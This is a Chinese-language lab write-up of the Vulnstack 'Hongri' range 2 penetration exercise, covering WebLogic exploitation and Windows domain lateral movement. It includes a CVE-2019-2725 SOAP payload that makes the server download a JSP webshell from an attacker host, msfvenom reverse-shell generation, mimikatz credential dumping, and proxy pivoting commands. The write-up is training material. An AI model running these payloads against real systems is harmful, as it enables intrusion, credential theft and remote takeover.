vulnstack 红日靶场二

环境搭建

以下是拓扑图

1qaz@WSX

web和pc两个网卡，一个nat一个仅主机，nat使用自动获取ip
域控只有一个网卡，仅主机，只用能用内网访问

开启服务
进入WEB中，来到C:\Oracle\Middleware\user_projects\domains\base_domain\bin 路径
使用管理员才能进去administrator/1qaz@WSX
以管理员权限执行startWebLogic

web渗透

首先拿到目标ip，我们进行一个端口扫描。

其他端口的测试这里就不说了，这里我们使用weblogic扫描工具

存在CVE-2019-2725

在网上找到利用方法

访问

http://192.168.100.131:7001/_async/AsyncResponseService

随即使用poc

POST /_async/AsyncResponseService HTTP/1.1
Host: 192.168.37.128:7001
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close
Content-Length: 850
Accept-Encoding: gzip, deflate
SOAPAction:
Accept: */*
User-Agent: Apache-HttpClient/4.1.1 (java 1.5)
Connection: keep-alive
content-type: text/xml

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing"
xmlns:asy="http://www.bea.com/async/AsyncResponseService">
<soapenv:Header>
<wsa:Action>xx</wsa:Action>
<wsa:RelatesTo>xx</wsa:RelatesTo>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>/bin/bash</string>
</void>
<void index="1">
<string>-c</string>
</void>
<void index="2">
<string>wget http://192.168.37.141:8080/JspSpy.jsp -O servers/AdminServer/tmp/_WL_internal/bea_wls9_async_response/8tpkys/war/JspSpy.jsp</string>
</void>
</array>
<void method="start"/></void>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body>
<asy:onAsyncDelivery/>
</soapenv:Body></soapenv:Envelope>

我这里没有利用成功，弄了半天也没弄好，暂时放一下，后面再另外搭环境仔细复现一下。

现在我们使用msf工具中现成的exp

1	search CVE-2019-2725

好家伙，exp也用不了，让我怀疑是不是环境出了问题，故去web服务器那看了一下。

居然报错了，也不知道是什么原理，百度。

好家伙，是权限不足的原因，web要登录de1ay的管理员administrator账号才可以。

好的，然后360直接就给你拦截了

受不了了，直接上工具

这时候上线msf或者cs就可以开始下一步的渗透了。

先穿上一个冰蝎马

试着连接一下

发现连接成功！

然后我们试着传一个msf的马

传上去是传的上去，但是无法执行

但是我目前还不太会免杀捏，直接双击了

但是突然接了个项目，明天再战。

真的会谢，来了这学校之后电脑都变慢了，环境也不知道怎么回事毁掉了，只能重新装一遍靶场

最后还是用以上方法拿到权限。

msfvenom -p windows/meterpreter_reverse_tcp LHOST=192.168.248.128 LPORT=1234 -f exe -o 1.exe   
#生成木马
use exploit/multi/handler
set payload windows/x64/meterpreter_reverse_tcp
set lhost 192.168.248.128
set lport 1234
exploit 
#监听

内网渗透

信息收集

先收集本机的一些信息（如果连接windowsshell是乱码的状态可以使用这个语句解决chcp 65001

arp、路由、杀软、防火墙、3389、hash密码、域内信息等

当前用户是域管理员

sysinfo

tasklist

发现360卫视

net user /domain

查看域内用户

net time /domain查域控

**net config workstation 查看是否有域，以及当前登录域**

**net view 查看域内主机列表**

**net group "domain controllers" /domain 查看域控制器(如果有多台)**

**net user /domain 查看域内所有域用户**

**net group "domain admins" /domain 查看域管理员列表**

**然后通过ping 命令查看域中主机的ip**

1	systeminfo 查下补丁

最后整理一下吧

域名 de1ay                   杀软：360安全卫士          

域内主机：三台  DC（10.10.10.10）  PC （10.10.10.201） WEB（10.10.10.80 和192.168.111.80   win2008R2）

域用户：Administrator            de1ay                    Guest                    krbtgt                   mssql    

 补丁：                  [01]: KB2999226
                           [02]: KB958488
                           [03]: KB976902

开始攻击

有大佬提出这样的一个攻击思路

尝试直接新建具有鱼贯权限的用户hack，密码为1qaz@wsx，然后开3389远程登录 (不推荐）

但我还在学习阶段就暂时不用这种了。

用kiwi抓明文密码把

首先迁移进程到一个64位的system进程

1 2	ps migrate 1928

1 2	load kiwi kiwi_cmd sekurlsa::logonpasswords

拿到其他主机的账号和密码

路由或者代理实现横向

在内网渗透的时候，有时候我们想继续探测内网的资源，但是由于防火墙的原因导致我们无法继续访问内部资源，此时我们就可以考虑添加路由或者端口转发等技术。

msf实现路由添加

msf查看网卡情况，并且添加路由
#获取当前主机下的网络架构分布
run get_local_subnets

添加路由访问
run autoroute -s 192.168.22.0/24

#在全局给指定的session增删路由

route add 192.168.11.0  255.255.255.0  1     #在session1中添加到达192.168.11.0网段的路由
route add 192.168.12.0  255.255.255.0  1     #在session1中添加到达192.168.12.0网段的路由
route add 0.0.0.0       0.0.0.0        1     #在session1中添加到达0.0.0.0/24网段的路由
route del 192.168.12.0  255.255.255.0  2     #在session2中删除到达192.168.12.0网段的路由
route print    #打印路由信息

查看当前路由列表
run autoroute -p

查看当前网络下IP列表端口
use auxiliary/scanner/portscan/tcp
set ports 80
set rhosts 192.168.22.0/24
set threads 100
run

利用proxychain配合socks4代理渗透
如果我们不想在msf里面探测，我们可以使用socks4代理，实现在代理扫描，漏洞探测
配置socks4代理
use auxiliary/server/socks4a
set srvport 2222
run

修改proxychain配置加入
vim /etc/proxychains.conf
socks4 192.168.131.159 2222

调用代理执行nmap扫描目标
proxychains nmap -Pn -sT 192.168.22.128

改路由没扫到其他主机，不知道怎么回事

那我们挂个socks代理对内网的主机进行一个探测

proxychains nmap -PA 192.168.123.1/24
#扫存活主机

proxychains nmap -Pn -sT -T4 -p21,22,135,445,80,53,3389,8080,1433,8080 10.10.10.10
#扫指定主机

nmap扫描局域网存活主机_nmap扫描在线主机的几种方法 | 绝缘体 (cxy163.net)

代理我后面再开个靶场自己练习

啥也没扫到，我人嘛了，直接上cs辅助吧。

background
use exploit/windows/local/payload_inject
set payload windows/meterpreter/reverse_http
set DisablePayloadHandler true
set lhost 192.168.235.129
set lport 8888
set session 2
run
#cs那边记得监听

好成功上线

这里使用cs的扫描

1 2	先扫一下内网存活主机 shell arp -a

然后可以开始横向了

横向移动

ping一下DC PC可以看到他们的ip

1 2	DC 10.10.10.10 PC 10.10.10.201

这里可以扫一下内网主机+端口扫描

portscan 网段 端口 协议（icmp arp none）线程
portscan 10.10.10.0/24 445 arp 50

portscan 10.10.10.0/24 1-1024,3389,5000-6000 arp 1024

既然存在445端口，那么可以用run minikatz模块进行横向（虽然早就拿到账号密码了

抓到密码之后创建一个smb，然后对目标主机进行横向

dc主机成功上线！

在那边pc也是没有过免杀的（360弹窗了，麻了，后面再学免杀把。

随后也是成功上线pc

拿下靶场！

(96条消息) psexec的底层实现原理是什么_Ping_Pig的博客-CSDN博客_psexec原理

vulnstack 红日靶场 二